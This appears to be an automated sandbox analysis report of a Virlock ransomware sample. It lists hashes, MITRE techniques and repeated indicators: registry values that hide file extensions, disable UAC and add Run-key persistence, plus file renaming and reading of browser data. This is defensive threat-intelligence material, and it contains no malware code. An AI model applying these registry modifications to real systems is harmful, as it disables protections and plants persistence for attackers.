b1057a8f78bc69f808aaf005b1a003aeb8864e35d76a62fe79bae0e48a01832f

Analysis

max time kernel
150s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
23-05-2024 08:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
Size

112KB
MD5

1e24dff3034f3fd4edb5752013f58b8a
SHA1

d93c3e3a944df7494d075cd7d4df88ee2f872bf3
SHA256

b1057a8f78bc69f808aaf005b1a003aeb8864e35d76a62fe79bae0e48a01832f
SHA512

658a05b802812ab81875ee72e14dc91a040bc585ccaf07583ac4c602a837bb4f7f44b2d405727b5a48d53e08af9047a9515cc4262902157caa1fd699d645befb
SSDEEP

3072:y49tbOqaM/iLI2j5lRsOb8ZJvfsArz0Oa02SBgI5TtV:ymFOqaMq8klv8ZJvfdro02SBgI5TtV

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Renames multiple (79) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mMsUIEsc.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	mMsUIEsc.exe

Executes dropped EXE 2 IoCs

Processes:

mMsUIEsc.exeMaIgMwUc.exe

pid process

1056 mMsUIEsc.exe
2204 MaIgMwUc.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exemMsUIEsc.exeMaIgMwUc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mMsUIEsc.exe = "C:\\Users\\Admin\\YakwQIkc\\mMsUIEsc.exe"	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MaIgMwUc.exe = "C:\\ProgramData\\ZMwYEkUY\\MaIgMwUc.exe"	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mMsUIEsc.exe = "C:\\Users\\Admin\\YakwQIkc\\mMsUIEsc.exe"	mMsUIEsc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MaIgMwUc.exe = "C:\\ProgramData\\ZMwYEkUY\\MaIgMwUc.exe"	MaIgMwUc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

Processes:

pid	process
1140	reg.exe
1628	reg.exe
2616	reg.exe
4800	reg.exe
224	reg.exe
3136	reg.exe
1488	reg.exe
548	reg.exe
4968	reg.exe
1396	reg.exe
3156	reg.exe
4156	reg.exe
3500	reg.exe
2928	reg.exe
3952	reg.exe
4348	reg.exe
548	reg.exe
4360	reg.exe
4156	reg.exe
4496	reg.exe
3744	reg.exe
1588	reg.exe
1252	reg.exe
448	reg.exe
2436	reg.exe
4772	reg.exe
764	reg.exe
3040	reg.exe
2372	reg.exe
4548	reg.exe
1772	reg.exe
1804	reg.exe
4056	reg.exe
4912	reg.exe
4076	reg.exe
3284	reg.exe
4424	reg.exe
3312	reg.exe
724	reg.exe
5040	reg.exe
4800	reg.exe
4452	reg.exe
4628	reg.exe
3552	reg.exe
5092	reg.exe
4884	reg.exe
1588	reg.exe
1536	reg.exe
1180	reg.exe
4384	reg.exe
1480	reg.exe
2436	reg.exe
2480	reg.exe
4372	reg.exe
4796	reg.exe
3752	reg.exe
2616	reg.exe
2592	reg.exe
1084	reg.exe
4608	reg.exe
4540	reg.exe
2372	reg.exe
2180	reg.exe
2148	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe

pid	process
1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
1128	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3372	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4944	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3328	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3328	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3328	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
3328	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4604	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4604	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4604	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4604	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4580	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4580	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4580	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
4580	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
2996	2024-05-23_1e24dff3034f3fd4edb5752013f58b8a_virlock.exe
